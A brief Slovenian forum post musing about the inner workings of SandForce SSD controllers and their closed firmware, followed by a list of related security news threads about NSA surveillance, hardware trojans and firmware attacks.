ko smo že pri storage kontrolerjih, še vedno se sprašujem kak magic se dogaja in-depth v sandforce kontrolerjih (sploh ta durawrite).

In glede na to da niti proizvajalci nimajo dostopa do kode, vprašanje kaj vse se še dogaja zram :D
#teamred
MediaBox: AMD R5 1600 AF, 16GB DDR4, 256GB SSD, 1060 6GB, B450M-DS3H, W10
1
2
3


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Greenwaldova knjiga o aferi NSA, še nekaj novih metod prisluškovanja

Oddelek: Novice / NWO
257736 (5092) link_up
»

Strojni trojanci na integriranih vezjih

Oddelek: Novice / Varnost
4916478 (11427) Matthai
»

Zanimiv napad na kontroler trdega diska (strani: 1 2 3 )

Oddelek: Novice / Varnost
12025714 (19635) MrStein
»

APT (Advanced Persistent Threats) napadi iz Kitajske

Oddelek: Novice / Varnost
124396 (3240) Matthai
»

Nov članek: "All your firmware are belong to us" (strani: 1 2 3 )

Oddelek: Novice / Nova vsebina
13812388 (9228) arrigo

Več podobnih tem